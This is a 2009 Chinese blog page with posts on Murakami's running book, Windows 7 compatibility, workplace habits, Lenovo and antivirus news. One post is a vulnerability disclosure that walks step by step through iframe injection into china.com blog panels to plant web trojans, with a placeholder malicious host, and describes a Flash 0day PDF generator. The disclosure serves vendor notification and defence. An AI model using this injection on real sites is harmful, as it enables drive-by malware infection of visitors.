博客首页|TW首页| 同事录|业界社区
2009-10-30

村上春树的《当我谈跑步时,我谈些什么》出了已经有一段日子了,我是最近拿来看的。以前对村上春树的记忆,就是他写过许多有关死亡和情爱主题的小说,例如《挪威森林》,中学时代我读这本书,对作者的想象是,他肯定如同日本电视连续剧《东京爱情故事》中的永尾完治或山上。

不过最近买回来《当我谈跑步时,我谈些什么》这本书时,才真正对村上春树有了具体的形象。原来他是如此瘦小精炼的一个男人,而且每天都坚持长跑。我以前就是职业中长跑运动员,这无疑增加了我对村上春树的许多好感。

在这本书中有这样一段话我很赞同,他说:普通跑步者,许多人都事先设定个人目标——这一次我要在多少多少时间之内跑完全程——然后再去挑战赛事。加入能在这个时间内跑完全程,就算“达成了某项目标”;如果未能跑出预定的成绩,就是“未能实现某项目标”。即便未能在预想的时间内跑完全程,只要有了业已尽力的满足感,或是为下次比赛奠定了些基础,抑或有了某种类似重大发现的东西,大约也算大功告成吧。换言之,在跑完全程时,能否感到自豪或类似自豪的东西,对于长跑选手而言,可能是最重要的。

这段话激发我的感触在于,现在有许多人包括我自己,做事情的时候总是会设定一个目标,不是说目标不好,或者不应该设置目标,而是由的时候目标显得过于高不可攀了,高的让整个完成目标的过程显得过于功利化,本来是在向着一个美好或者更高的理想迈进,然而由于过多的经历****在目标的结果和数字上,导致了完成目标的历程太过艰苦,用任田姊姊的话说就是遭罪。所以,在做某些事情的时候,我们盯着目标就可以了,心里知道有目标就可以了,用心朝着目标努力去就可以了,而不用将目标特别是数字或者结果背负在心里,成为一种负担。

村上春树也做了这样的说明,他说:同样的说法也适用于写作。小说家这一职业,至少对我来说,是无所谓胜负成败的。书的销量、得奖与否、评论的好坏,这些或许能成为成功与否的标志,却不能说是本质问题。写出来的文字是否达到了自己设定的基准,这,才至为重要;这,才容不得狡辩。别人大概怎么都可以搪塞,自己的心灵却无法蒙混过关。在这层意义上,写小说很像跑全程马拉松,对于创作者而言,其动机安安静静、确确实实地存在于自身全部,不应向外部去寻求形式与标准。

对于我写专栏的启示是,什么水准的确不重要,超越了昨天的自己,哪怕只是那么一丁点儿才更为重要。就如他说的一样,如果说有什么必须战胜的对手,那就是过去的自己!

/苗得雨

Windows 7的登录时间如今已经进入倒计时状态,让用户接受这样一个界面华丽美观,更加人性化的产品并不困难,然而对于多数用户而言他们担心的并不是Windows 7是否易用,而是这样一款革新性产品是否会存在兼容性问题,能否兼容已有在Windows XP下运行正常的软件呢?

 

兼容,必须面对的现实

在Windows Vista推出的初期,微软的思路是希望展现Windows系统的革命性创新,因此兼容问题并没有被列入首要考虑的问题。但也正是Vista在初期对各种软件兼容性的挑剔,导致了众多软件在Vista上运行不佳。

最突出的问题出现在网络游戏中,许多能够在Windows XP下正常运行的程序,一旦操作系统环境更换为Vista之后,游戏就开始出现各种各样由于兼容性产生的问题。而当用户咨询游戏厂商的时候,从游戏客服那里得到的回答通常是:“Vista不兼容该游戏,建议用户更换成XP系统。”这种回答给用户造成的感觉就是Vista本身的兼容性是有问题的。

除了游戏用户,各种旧版本的软件,甚至在Vista刚投放市场的初期,5%的网络银行软件也对Vista有排斥,这种不兼容导致许多用户在生活工作中必须的软件无法正常使用,导致用户不得不将系统倒退更换回XP,而对Vista兼容性的诟病就在这样的环节中不断的被放大。这也给微软在普及Vista上造成了一定的难度。

其实在微软初期推广Windows XP系统的时候,也遇到了平台兼容性问题,不过在当时并没有如此多的计算机用户,用户使用的软件也相对集中,几款主流软件改进兼容Windows XP之后,对绝大多数用户而言兼容问题好像就随之消失了。

在今天电脑用户激增的环境下,Vista面对的不仅是用户的激增,还有各种软件的徒增。可电脑软件之间的兼容性并不是仅靠Vista一个操作系统就能够改善的。除了微软自身提供各种兼容性解决方案以外,这其中还需要应用程序、开发平台开发商和硬件厂商等能及时对软件和硬件驱动进行升级以配合新操作系统。

不过,从Windows XP到Vista,由于系统体系架构有了重大的变化,而Vista在发布过程中又多次跳票,导致软件开发商和硬件驱动商一无经验二缺时间,因此在Vista发布初期,相当部分产品未经过充分测试,及时升级更成为了不可遥望的理想。

但无法改变的现实是,在用户严重,Vista的兼容性问题,仍然是操作系统的问题,仍然是微软的问题,这成为了微软不得不面对的现实。

 

在“预”兼容中重新打量每个环节

如今,Windows 7上市的倒计时已经滴答作响,在许多用户眼中,它是一款更时尚的革命性产品,有比Vista更加绚丽的特效,也有让人砰然心动的色彩和易用的操作性,但是兼容性的顾虑仍然是决定许多用户是否选择升级Windows 7的重要因素。

回顾Vista我们也发现,Vista从设计来说不可谓不是一款优秀的系统,但发布初期所留给用户的不佳印象已经很难消除,即便微软通过SP补丁包改善了部分兼容问题,仍然没有让Vista普及之路更加顺畅,直至今日,Vista仍然未能占据市场主流。面对这样的深刻的记忆,微软是否能够改善Windows 7的兼容性呢?

对于用户的疑惑,微软此次似乎相当自信。

这种自信有部分原因要得益于Vista的铺路,由于Windows 7是从Vista基础中继承发扬而来,因此对于那些已经兼容Vista的绝大多数软件而言,兼容Windows 7将不会存在如同XP那样跨越性的问题。如今许多主流软件经过Vista的磨合已经能够实现对Vista完美融合,这些软件都将会平稳过渡到Windows 7之中。

微软还从Vista中买到了另外一个教训,那就是给合作伙伴们足够的时间和足够的资源,让他们用来解决兼容性问题。其实每个软件厂商都有改善自己产品,让自己产品兼容更新操作系统的意愿的,但是由于以前缺乏与微软之间的密切合作,导致许多厂商的研发团队不得不自己摸索新系统的特性,这也导致了在解决兼容性方面的裂痕。

所以为了改善这个问题,在Windows 7的研发过程中,微软采用了“预”兼容的原则,也就说要在Windows 7正式发布前解决大多数兼容性问题。为实现这一目标,微软很早就开始与相关伙伴密切合作,通过徽标认证计划、成立硬件评测实验室以及为合作伙伴提供Windows 7升级助手、培训和技术白皮书等工具与资源,确保Windows 7上市时,在兼容性方面有足够的把握。

来自第三方的检测数据显示,截止9月1日,在微软和伙伴的共同努力下,在中国市场已有91%的应用程序、92%的硬件设备和95%的网站实现了与Windows 7的良好兼容;在网银方面,Windows 7已经与覆盖80%用户群体的6家主要银行网银系统及支付宝电子商务平台兼容。而且随着Windows 7发布日期的临近,兼容的比例还会不断提高。显然,对于普通消费者和中小企业用户而言,这样的兼容性表现已经能基本保证用户工作环境的平稳迁移。

实际上,要在Windows 7上市之前做到这些实属不易。据微软中国消费与在线事业部市场部总经理韦青介绍,在Windows 7开发过程中,最大的特点就是认真倾听了用户的反馈。“我们不仅听进去了,执行了,而且我们知道一定要保证现在用的无论是硬件、软件,还是在线服务,都能够兼容,用户才有理由升级到下一个操作系统,否则下一个操作系统再好也没有意义。”

 

编后语:Windows 7自信,在于顾及大众标准

曾经何时,微软在力推Vista系统的时候,也无比自信,自信在XP时代就被大众诟病的界面美化效果在Vista中有了较大的改善,或许在当时的微软看来,无论是Windows 98还是Windows XP,只要摆脱了刻板的界面,让皮肤和效果看起来更炫一些,让操作系统的安全性更高一些,就能够吸引足够多的用户迁移到Vista之中。

然而事实证明,微软错了!

对于绝大多数普通用户而言,电脑已经不是向同伴炫耀一个动感的界面,不再是解决某个特定问题的机器。电脑已经成为了大众生活中的一部分。Windows XP长久来培养的用户习惯已经成为了一种标准。

无论微软的工程师多么厌恶XP的缺点,但是对于百姓而言,XP的包容并兼是它吸引用户的最大魅力,Vista只想建立自己的新标准,所以成为了被大众诟病的产品。

现在,微软又携Windows 7卷土重来,然而这次在Windows 7中,微软放下了姿态,提前和合作伙伴沟通,提前征询用户意见,用多种手段来解决兼容问题,并面对现实,认可大众标准。在这种务实的改善下,在这种契合用户习惯,将用户的适用性作为第一标准的努力下,我们看到微软在Windows 7中更加自信了。

或许,这才是我们期望的Windows 7,实用的操作系统。

叶耘

某月某日,某同事开完会就奔赴机场,不久打来电话说:没赶上飞机。另一同事洒笑:“他长得就像赶不上飞机的,你看他的记事本还落在这儿了。”

人对人的第一印象通常很难磨灭。一个人是否诚信可靠、堪当大任,通常小处见大,在不知不觉中就让大家下了不可逆转的定论。比如,你办公桌的整洁度,还有你做事的条理性。

关于整洁度和条理性对一个人在职场上的诚信度评分,中国人和西方人看法不尽相同。

中国人的看法:鸡窝里飞出金凤凰,别管家里乱成啥样,我走出来光鲜照人不就得了?这很符合国人面子工程的心态。

西方人的看法:英国有句谚语:整洁近于美德。很多人会把个人的整洁度和诚信度联系在一起,甚至认为一个人的整洁度会影响他的道德判断力。

高手点评:老板看员工,同事看同事,扫一眼工位的整洁程度就产生了第一印象。大家很难相信一个座位上杂乱无章、文档堆得随时有山体滑坡危险的人会纪律性强、重承诺。哪怕桌上的文档如山,只要分门别类排放整齐,大家都会认为你擅长归纳总结,相信你具备把各种纷繁复杂的项目整理成序的能力。

除非是艺术家,只要在企业供职,如果老板、同事觉得你做事不靠谱,你的职业前景能有多远大?

职业攻略

有人怪同事总是疏远他,有人怪老板总是瞧他不顺眼,还有人怪客户总是喜欢先入为主刁难他,但他们忘了问问自己,这到底是为什么?一个人疏远你,两个人看你不顺眼都很正常,超过三个人喜欢刁难你就要从自己身上找答案了。

也许你没有做过什么得罪人的事,也许你很努力地去和别人沟通过,却始终无法改变他们的印象。在你百思不得其解的时候,答案或许简单而残酷,一个小小的细节就可能出卖了你。请对照以下小节,看看你卡在了哪里?

1. 你的工位摆放整洁吗?

─ 不整洁的恶果上面已经提到了。

2. 你不在座位的时候,抽屉和柜子会上锁吗?

─ 公司文件都是商业机密,考验你做事严谨性的时候到了。

3. 你喜欢丢三落四吗?比如把记事本、手机落在会议室,或其他同事的桌子上?

─ 记事本和手机里的信息都会涉及公司的业务,你对它们的重视程度就是你对公司业务的重视程度。

4. 你经常找不到文档,无论是纸质的还是电子的?

─ 等同于警察找不到****,你觉得是小错误吗?

5. 你在电子邮箱爆掉的时候才想起来清理邮件?

─ 难道这么久你都不整理下邮件么?你觉得它们都不重要,还是你从来都不看?这影射出你对工作的态度问题。

6. 你的重要电子文档喜欢存在电脑的桌面?

─ 看来你拿什么都不当回事,为了图方便,做事很随意啊!

7. 你忙的时候接了电话,答应别人稍后回的电话都回了吗?

─ 随口说等下打给你然后就杳无音信,那还不如直接跟人家说“你能过一小时打给我吗”,这样人家忘了打,也不是你的诚信问题。

8. 开会的时候,别的部门同事发言,你会显得心不在焉吗?

─ 学会尊重别人,别人才会尊重你,何况别人的信息也未必就对你没有帮助。

还有很多诸如此类的小节,如果你都大咧咧地放任自流了,也就无法责怪大家对你诚信可靠程度的质疑了。

2009-10-28

   本期主角:中华网博客

   问题所在:IFRAME代码过滤不严

   主要危害:进行挂马攻击

   漏洞状况:已通知修复

中华网——中国最早的门户网站之一,并且是最早在纳斯达克上市的中文网站。依靠着China.COM这个包含有中国的名称,中华网吸引了许多国内外的互联网访问者,率先开启了“中国概念”时代。

目前,中华网所提供的产品及服务包括博客、电邮、网上广告、企业黄页、交友、搜索、电子商贸、新闻资讯,以及垂直的频道如军事、汽车、体育、娱乐、美容、城市资讯等内容服务。其中的军事、汽车及体育频道已经发展成为强大的垂直频道。

图1

对于这样一个直接以中国命名的门户网站,在许多人的感觉中,会惯性的认为安全性一定很高,可是事实上是否真的如许多人想象的那样呢?或许并不是我们想象的那样乐观。

9月18日,许多安装有“锐甲”浏览器保护软件的用户发现,只要访问中华网博客频道的某些文章,“锐甲”就会弹出红色的提示窗口,提示网站内容中含有网页木马,在许多人还对中华网是否真的被黑客挂马将信将疑的时候,我们决定发扬探索的精神,对中华网博客一探究竟。

图2

博客中的漏洞规则

对于网站出现挂马情况,特别是在博客频道出现挂马,十有八九是因为出现了跨站漏洞,而在进一阶段,黑客通过挖掘有影响力的大网站中的跨站漏洞,特别是博客、文章转载发布系统等寻找XSS跨站漏洞,几乎成为了一种漏洞挖掘的流行风,所以中华网博客频道被挂马,我们的第一个直觉反应就是跨站漏洞。

安全小百科:跨站漏洞目前在国内外许多网站中都大范围存在,黑客主要利用知名网站中的跨站漏洞进行挂马,依靠用户对于这些知名网站的信任达到迷惑用户,使这些网站成为黑客挂马的跳板。这就如同你一直信任某家医院,但是这家医院却因为疏于做内部检查,导致有恶意的外来假冒医生可以在医院内部开设虚假诊所,打着这家医院的旗号欺骗患者一样。

为了证实我们的判断,我们再次找到被挂马的博客,通过源代码分析很快发现,黑客很可能是通过自定义模块功能,将网页木马地址加入到中华网博客中的。于是我们决定注册一个中华网账户进行测试。通过测试我们发现,中华网在博客内容编辑页面和标题栏等都做了很好的过滤,说明中华网还是非常重视清理网页中的隐患的。

但在中华网的自定义内容中,我们很快发现了可以被黑客利用的漏洞,“首页内容维护”模块在过滤恶意HTML脚本方面存在过滤不严的问题,这就意味着黑客可以通过构造一个非常简单的恶意HTML代码,就让中华网博客显示出来自中华网之外的网站内容。而浏览器就会在用户不知情的情况下自动加载Google页面。而通过IE临时文件夹中的Cookie我们看到了加载后Google页面的相关信息,这证明我们已经找到了一个全新的中华网的跨站漏洞。

究竟是什么原因导致中华网成为黑客挂马的乐园的呢?再次打开被挂马的博客,右键点击查看源代码发现黑客使用的是HTML中的<iframe>标签来实现挂马的。iframe元素也就是文档中的文档,或者好像浮动的框架(FRAME)。

了解了黑客使用的挂马手法之后,我们很容易就分段出来,黑客其实利用了中华网博客对于HTML标签过滤不严的漏洞,选择了iframe这样一个容易被忽视的标签,作为了挂马的手段,而中华网博客虽然过滤了其他部分HTML,但是对于部分组件的HTML并没有被过滤,最终导致了跨站漏洞。

在此之前我们也介绍过许多类似的漏洞,其实国内许多博客网站都存在这样的矛盾心情,一方面不愿意全面禁止能够帮助用户产生丰富效果的HTML等网页元素,但是另一方面又疏堵住黑客能够利用的导致跨站漏洞产生的脚本元素。这非常像我们现在的杀毒软件一样,通过病毒程序中的特征码识别病毒,但是由于有很多病毒没有特征码,导致总会有病毒会在用户的电脑中横行,而杀毒软件却暂时无法查杀的现象。

漏洞实现方法

根据整个事件的分析,我们发现黑客在中华网博客这种有影响力的网站挂马时喜欢使用最新的溢出挂马工具,生成0Day溢出木马,然后在获取一些有影响力的博客,将木马悄悄的挂到博客中。那黑客是如何在中华网中挂马的呢?

步骤1:Flash 0Day是最近最为流行,也是最新的0Day溢出。黑客通常会用特制的Flash 0Day生成工具,生成一个PDF格式的溢出文件,这个PDF格式的文件中,包含有Flash元素,当用户使用浏览器点击打开浏览或者下载浏览该PDF时就会中马。

我们也找到了其中的一款Flash 0Day生成器,生成了一个可以溢出的PDF文件,只需要在生成器中输入配置好的下载者等微型下载木马的网址,然后点击生成即可。

图3

步骤2:黑客会将生成好的Flash溢出文件上传到自己的网站空间中,然后在去中华网注册一个账号,我们在重现测试过程中也注册了一个账号。

在此次测试中我们注册的中华网通行证帐号为:test_xss;申请博客域名地址为:http://testxss.blog.china.com/;昵称:安全测试。账号注册完成后,填写博客地址,标题这些简单的设置。

步骤3:接着下来我们通过申请号的通行证号码登陆到中华网,进入中华网博客页面,点击博客上方的“控制面板”选项。进入控制面板选项之后,在进入“首页内容维护”选项中。

 

图4

步骤4:进入“首页内容维护”后,在网页右侧上网找到“自定义空白面板”一栏,然后点击“点击进入编辑界面”按钮。点击该按钮之后,网页会弹出一个名为“自定义空白面板列表”的新窗口,在这个新窗口中点击“新增”按钮,进入到编辑界面。

 

图5

在编辑页面中的面板标题中我们随意填写一个名称“赞助商链接”,然后在“面板简介”中点击蓝色地球图标的“插入链接”,接着弹出的网页中“链接地址”一栏后面插入iframe恶意代码:“<iframe src=http://www.xxx.com/ width=111 height=100 border=0></iframe>”,代码填写完成之后点击“确定”按钮,最后在点击“保存”按钮。

步骤5:完成之后我们再次打开中华网博客http://testxss.blog.china.com/,为了测试安全起见我们将恶意地址更换成了百度的网址,而博客中也出现了百度的画面,证明中华网博客的首页的确存在严重过滤不严的问题,所以这段代码可以达到挂马的效果。

图6

中华网博客还存在很多跨站问题,主要还是在对HTML的标签没有做严格的过滤。如果挂马者利用该漏洞,把我们测试链接“http://www.baidu.cn/”换成网马链接,当用户浏览该博客页面,就有可能中木马病毒,所以中华网博客的这个漏洞属于高危漏洞。

防范手段:

作为中华网的博客项目部,只需要详细筛查一下,那些可以允许用户输入代码或文本的地方未作标签和引号过滤即可。目前针对跨站漏洞,黑客常用的手段是通过Flash 0Day这样的威胁性较大的新溢出漏洞使用,因此用户在打补丁的同时,想要彻底弥补漏洞,还安装《锐甲》等浏览器辅助安全软件。

软件资料

锐甲测试版0.4.2  2009/10/12

安装包大小: 2.85MB

支持操作系统: Windows XP、Windows Vista、Windows 7

支持浏览器: IE6、IE7、IE8、世界之窗、360se、傲游、AVant需手动设置

下载地址:http://www.ruijia.cn/download.html

 深度分析 

    中华网博客采用的是JSP,所以从服务器和网站本身的安全性来讲,对于一般的黑客还是具有相当的挑战性的。不过大概也正因为如此,中华网忽略了一些类似跨站脚本这样的攻击手段,让黑客可以轻松的通过中华网的众多漏洞威胁到用户的安全。

    从中华网的案例来看,许多网站程序员都已经开始注重博文编辑输入页面中的恶意脚本过滤,但是却忽略了博客模块中的代码过滤问题,这是目前导致许多博客网站漏洞频传的一个重要原因。所以对于博客和论坛的管理员来说,在使用博客插件模块和论坛插件模块的时候,务必要亲自检测一下代码的安全性,加入代码过滤之后,在进行正式使用。

    由于该漏洞目前是首发漏洞,而中华网缺乏对网络挂马博客的有效监控,因此漏洞目前尚未弥补。所以最近对于经常访问中华网博客的网友最好能够安装“锐甲”等浏览器安全防护软件,保护自己的上网安全,避免因为访问到被挂马的页面而导致邮箱账号、网上银行账号、QQ账号等被盗,甚至成为黑客的“肉机”。

 

    延伸阅读

    目前中华网仍然有多个小模块存在漏洞,建议管理员进行详细的排查,必要的时候可以使用XSS漏洞检测工具,例如XSS LFI File Disclosure Scanner、Paros 等,对全站页面结构进行扫描,极有可能发现新的安全漏洞。而我们也将会把我们掌握的漏洞信息通报给中华网,帮助这个带着中国印记的网站做的更安全。

    如今网站在建设过程中,随着网站的体积和规模的不断加大,避免不了团队之间的协作,这种协作过程中最容易让网站出现标准不一致,代码安全性降低的问题,特别是对于重用代码的审核不严格,更是造成重大隐患的根源。因此网站项目管理团队加强代码安全性审核,也只有如此,才能够避免XSS这种低级的跨站攻击漏洞。

2009-10-26

我发现许多公司内部许多小团队和团队管理者都很忙,但是这种繁忙并没有增加公司的解决问题的效率,人人都在忙,但是似乎忙的没有效果。
    根据美国政府对于中小企业的经营者所作的分析显示,“忙”的类型有下列数种,可作为自省的参考:
    一、喜欢指挥型:这种人什么事情都要管,就结果而言,是处处妨碍别人工作。
    二、喜欢开会型:什么芝麻绿豆的小事都要开会,不仅浪费时间,也没有时效。
    三、梦想型:满脑子只有“明天来做什么”的空想,而没有一点实行能力。
    四、爱管闲事型:什么事都要插手,但不知其他的人,其工作效率会受到影响。
    五、图表型:只知道天天忙着做统计图表,不知活用所得到的资料。
    六、堆积如山型:是文件堆积如山为乐的人,这样的人唯有如此才能心安理得,实际上不见的真正在做事。
    七、天才型:本身的工作熟悉程度确实较别人为甚,只是因为此喜欢教导别人,结果反而疏忽自己工作。
    八、门户开放型:以广泛听取属下意见为最大乐事,连自己不知道的事情也要管。

在团队工作中,团队人员和管理者忙一些的确可以从忙中学习,从忙中得到收获,从忙中增长见识,从忙中减少烦恼。但是问题是要“知所以忙”,不要犯了以上任何一项。生命诚可贵,不要把时间浪费在无谓的事情上。

所以星云大师在说忙说闲时提到,有很多时候不过是处理问题和事情的表面现象,若能够理事圆通,则虽忙犹闲。有一句歇后语是这样说的:
    “闲到心头便是闲,心闲方可话山居;
    山中剩有闲生活,心中不闲时居更难。”

真正的闲,是心头上超然物外的闲。若心中无所住着,不计较人我得失,就能安住于清闲的生活中,而不被生活所羁绊,就可以做到能忙能闲、能动能静、能早能晚、能饿能饱、能进能退、能上能下、能有能无……无所不能!

很多公司不注重岗前培训,这是让中层领导干部和员工都很郁闷的事情。不重视并不是没有做,而是做了并不符合公司实际情况,或者符合员工岗位情况。许多新员工上岗后,既不了解公司产品情况,也对公司结构不清楚,在工作中遇到什么类型的问题,应该去找谁协调,都没有方向,最后产生巨大的失落感,感觉自己在一个孤岛上一样。员工求助领导又会导致事情拖延,效率降低产生工作积累。

管理干部在使用缺乏正确培训的员工时也会很郁闷,当管理干部将任务布置给员工后,缺乏技能培训的员工会直接反馈自己因为不会使用某款软件,而不能够完成任务。如果此时干部指示员工熟练该款软件,则很可能许多时间将会浪费在软件环境熟悉中,而且员工此时会将熟悉软件环境当做一项工作任务,并且在此后完成任务不够优秀的时候,也能够祭出软件不熟悉这个理由,让管理干部无话可说,这是很痛苦的过程。

但这全部过程其实是可以依靠前期的培训解决的。

2009-10-23

10月20日,联想携手合作伙伴和业界专家,在北京举行了第二届商用技术发展论坛,联想秉承“CEMS”理念(C-Cost,E-Efficiency,M-Management,S-Security),推出一系列相应的解决方案,致力于在成本、效率、管理、安全四个方面帮助客户创造全面的价值。

在去年联想的第一届商用技术发展论坛上,联想首次提出了“CEMS”理念,致力于帮助商用客户应对全球金融危机的挑战。近一年来,这一理念成为越来越多的商用客户IT建设的共识。

而作为一个中国本土企业,联想是有非常有韧性的一个企业。这一点从联想的成长过程中就可以看到。1984年,联想与戴尔分别在中国和美国同年诞生时,都是籍籍无名之小辈。1998年,PC业两位几乎同龄的领军人物风华正茂,33岁的迈克尔·戴尔带领戴尔公司以50%的年增长率登上《商业周刊》百强榜首,其直销模式令康柏、惠普、IBM等传统PC列强感到恐惧。

而遥远的大洋彼岸,34岁的联想电脑公司总经理杨元庆则率领联想PC在中国开始了一骑绝尘的传奇,当年即获得15%以上的市场份额,随后几年这一数字又翻了一倍。戴尔在全世界打败了康柏、IBM、DEC、AST等PC巨人,联想则在中国打败了它们,包括戴尔。

2001~2003年,戴尔兵临城下,两位后起之秀在中国逐鹿一战。还沉浸在多元化和“中国的IBM”宏梦中的联想被戴尔的直销威力惊醒,亡羊补牢开始回归PC本业,搭建R(关系型)与T(交易型)双业务模式,重又站稳脚跟。此战未完,联想已立志“来而无往非礼也”。杨元庆率联想收购了总资产4倍于己的IBM PC业务。

在收购IBM PC业务之后,联想的年销售额由200亿港元增长为170亿美元,去年它以167.8亿美元的年收入首次进入《财富》全球500强,排名第499位;全球PC市场的排名由第9位升至第3,又滑至第4,市场份额由2.2%涨至7.8%,最新的Gartner数据是7.1%。看市场表现,中国区对联想销售额的贡献份额在2006财年自前一年的36%继续上升,至38%;看业务模式,联想总结出来的关系型模式(面向大客户)与交易型模式(面向中小企业及消费市场)并行的“双模式”在中国是令对手感到可怕的战车。

消化IBM之后直接带来的是优质的高端用户,如今对于高端商务用户而言,联想ThinkPad已经成为了高品质的代名词。自诞生以来的17年间,联想ThinkPad对于高品质的追求从未止步。在交付用户之前,ThinkPad笔记本要经过一套被称为“拷问试验(TORTURE TEST)”的极其苛刻的测试,比如,在键盘上洒下咖啡,测试防水性能;在140度的高温到零下20摄氏度的低温之间,测试稳定性;从一米二的高处掉落来测试机身坚固性。不管是“APS主动硬盘保护技术”, “镁制防滚架”、还是“应急与恢复系统”,这些创新技术都确保了联想ThinkPad的高安全性。

ThinkPad的高品质不仅为客户的数据安全和业务发展提供了重要保障,还直接降低、甚至避免了后续的维修、维护成本,有效地降低了用户的TCO(总体拥有成本)。联想在中国区的市场份额在两年间从25.1%做到了令人惊叹的36.7%,目前按照目标消费者的不同,联想建立了覆盖个人、中小企业、大企业三类用户的完整商用产品线,包括:针对高端商务个人的ThinkPad笔记本,针对中小企业的V系列、扬天系列,以及针对大客户的ThinkCentre、昭阳、启天系列。

现今“CEMS”理念已经融入到联想针对商用客户提供的全套解决方案中。这背后所依托的,是联想全球协同的高效创新体系,强大的产业垂直整合能力,以及国际化的视野。这些优势,让联想能够将业内领先、最合适的产品、技术和服务第一时间带给用户。相信在激烈的商用市场竞争中,“CEMS”也将成为巩固和发展联想商用市场领导地位的利器,让联想实现再一次起飞。

 大名鼎鼎的江海客的杀毒软件公司在招兵买马,给我发来一套海报,看了一下,还是挺酷的。不过在此之前我也曾给他们提供过另外一套海报创意,可以因为各种原因在这一次终没有成行。

    江海客是反病毒界的偶像级人物了,他创建安天也是一个很有希望和活力的公司,在目前国内反病毒企业中,是少有的拥有自己的反病毒引擎核心技术的反病毒厂商,技术研发实力非常强。

    安天最近还成为了国家级应急响应单位,成长的速度堪比东北的玉米,非常惊人。所以在此呼吁那些对网络安全和反病毒感兴趣的朋友们,特别是应届毕业生们,投简历吧!

    这次以应届毕业生为主。感觉自己特别优秀的,需要我推荐的,也可以投到我的邮箱里:miaodeyu@vip.sina.com 

    工作地点:哈尔滨

2009-10-22

360推出正式版免费杀毒软件了,早在此次免费之前360其实就已经开始免费杀毒软件的推广,只不过一直处于试水的测试阶段,并没有推出正式版本。依靠免费做大的360对免费一直情有独钟,360安全卫士就一直以免费的安全软件作为卖点,只不过因为其杀毒能力极弱,因此在病毒查杀方面依然只能够建议用户再安装一款真正的杀毒软件。

而这次的360杀毒则是一款真正的杀毒软件,就杀毒能力而言,要比以前的360安全卫士大大提高。不过此时说免费的360杀毒会成功还为时尚早,首先360杀毒使用的扫描引擎是从BitDefender购买而来,360自己并没有自己的引擎技术,形象一点儿比喻,360目前只是一个能够生产汽车外壳的组装厂,距离真正能够生产核心的发动机还有很远的路要走。BitDefender一旦不和360续约,360杀毒很可能就会让用户遭遇大的变动和折磨。

其次,360安全卫士实行免费,但是由于能够推广卡巴斯基等杀毒软件,因此可以从其它杀毒软件身上分一杯羹,而如今360开始做自己的杀毒软件,自然会让众多和360合作的杀毒软件有所顾忌,即便这些杀毒软件不会和360立刻分裂,但是360这种与虎谋皮的想法,恐怕也会让这些杀毒软件厂商对360更加谨慎。

所以,从目前来看360做免费杀毒软件只能够算是开了一个头,而结尾恐怕并不会像360杀毒广告上说的那样信心十足。

近日,微软在北京宣布推出首批Windows Phone手机,来自不同手机厂商的17款手机将采用Windows Mobile 6.5操作系统,这些手机将于年底上市。而在此之前,微软已经宣布,将要在全球超过20个国家同步发布Windows Phone新品牌,并宣布Windows Mobile 6.5系统正式上市。Windows手机线上软件商店Marketplace,以及手机线上备份服务My Phone也随之上线。

微软以前向来将手机市场作为自己的重头戏,所以此推广Windows Phone的行为,被大众视作是微软用来打击抗衡近几年人气猛涨的苹果的一种手段。特别是苹果自从发布了iPhone之后,不仅在手机硬件中大赚特赚,还依靠软件商店,狠狠的捞了一把,涉足进入以前被电信运营商牢牢把控的通讯市场,这些无疑也是微软眼红的。

但从目前的市场来看,微软此次大举进军手机市场,打响Windows Mobile反击战,或许并非为了打压苹果这样一个单纯的利用。从消费者近几年的数码设备市场变化可以看出,越来越多的手机逐渐开始走向智能化,数码设备的市场已经发生了整体环境的大变化。用户不在单纯依靠电脑设备处理日常的工作,数码设备开始承担越来越多的任务。这是微软看好手机市场的重要原因之一。

此外,以前困扰微软推广Windows Mobile的阻力还有手机设备性能和芯片的不统一,有些设备虽然有细微的差异,但是微软就需要为这些细微的差异单独制作一套专门的Windows Mobile。而近几年数码硬件越来越同化,差异性在缩小,性能在提高,这些都让Windows Phone的推广门槛降低。